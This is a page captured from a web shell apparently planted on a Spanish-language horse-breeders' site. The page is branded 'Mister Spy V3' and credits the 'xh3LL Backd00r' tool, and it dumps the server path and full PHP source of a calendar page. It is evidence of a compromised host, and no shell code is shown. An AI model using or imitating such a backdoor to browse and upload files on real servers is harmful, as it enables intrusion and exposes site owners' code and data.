Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/espanol/
Upload File :
Current File : /home/caballoscriollos/www/espanol/pop_calendario.php

<?php 
	header('Location: ../sitio/');
	exit; 
require_once('../Connections/cnx.php');
require_once('../funcs.php');

mysql_select_db($database_cnx, $cnx);
$query_rsCalendario = "SELECT * FROM noticias WHERE rubroID = 2 AND habilitado='1' AND fecha_1 >='".date('Y-m-d')."' ORDER BY fecha_1 ASC";
$rsCalendario = mysql_query($query_rsCalendario, $cnx) or die(mysql_error());
$row_rsCalendario = mysql_fetch_assoc($rsCalendario);
$totalRows_rsCalendario = mysql_num_rows($rsCalendario);

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Detalle de Calendario Criollo</title>
<link href="../css/basico_frontend.css" rel="stylesheet" type="text/css" />
<!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id=UA-112666274-1"></script>

<script>

  window.dataLayer = window.dataLayer || [];

  function gtag(){dataLayer.push(arguments);}

  gtag('js', new Date());

 

  gtag('config', 'UA-112666274-1');

</script>
</head>

<body>
<table width="100%" class="FondoBlanco">
  <tr>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td width="10">&nbsp;</td>
    <td><table width="100%" height="20" border="0" cellpadding="0" cellspacing="0" background="images/accc_fondo_botonera.png">
      <tr valign="middle">
        <td width="10" height="31">&nbsp;</td>
        <td height="31" class="TituloPrincipal">CALENDARIO
          <?=date('Y')?></td>
        <td height="31"><div align="right"><a href="#" class="linkBlanco" onclick="javascript:window.print();">[Imprimir]</a></div></td>
        <td width="10" height="31" class="TituloPrincipal"><div align="right"></div></td>
      </tr>
    </table></td>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td height="1"><div align="center"></div></td>
    <td height="1"><div align="center"></div></td>
    <td width="10" height="1"><div align="center"></div></td>
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="bordeGris">
      <tr>
        <td height="25" class="FondoMarron"><div align="center"><strong>&nbsp;Fecha</strong></div></td>
        <td class="FondoMarron"><div align="center"><strong>Fecha Cierre Inscripci&oacute;n</strong></div></td>
        <td class="FondoMarron"><div align="center"><strong>Fecha Ingreso de animales</strong></div></td>
        <td class="FondoMarron"><strong>Exposici&oacute;n</strong></td>
        <td class="FondoMarron"><div align="center"><strong>Categor&iacute;a</strong></div></td>
      </tr>
      <?php do { ?>
      <tr>
        <td height="20"><div align="center">
          <?php 
	  if($row_rsCalendario['fecha_1']!="" && $row_rsCalendario['fecha_2']!="")
	  {
		  echo smrFormateaFecha($row_rsCalendario['fecha_1'],'d/m/y')." hasta ".smrFormateaFecha($row_rsCalendario['fecha_2'],'d/m/y'); 
	  }
	  ?>
        </div></td>
        <td><div align="center">
          <?php if($row_rsCalendario['fecha_3']!=""){echo smrFormateaFecha($row_rsCalendario['fecha_3'], 'd/m/y'); }?>
        </div></td>
        <td><div align="center">
          <?php if($row_rsCalendario['fecha_4']!=""){echo smrFormateaFecha($row_rsCalendario['fecha_4'], 'd/m/y'); }?>
        </div></td>
        <td><?php echo strip_tags($row_rsCalendario['titulo_1']); ?></td>
        <td><div align="center"><?php echo strip_tags($row_rsCalendario['titulo_2']); ?></div></td>
      </tr>
      <tr>
        <td colspan="5" bgcolor="#CCCCCC"><div align="center"></div></td>
        </tr>
      <?php } while ($row_rsCalendario = mysql_fetch_assoc($rsCalendario)); ?>
    </table></td>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
  </tr>
</table>
</body>
</html>
<?php
mysql_free_result($rsCalendario);
?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat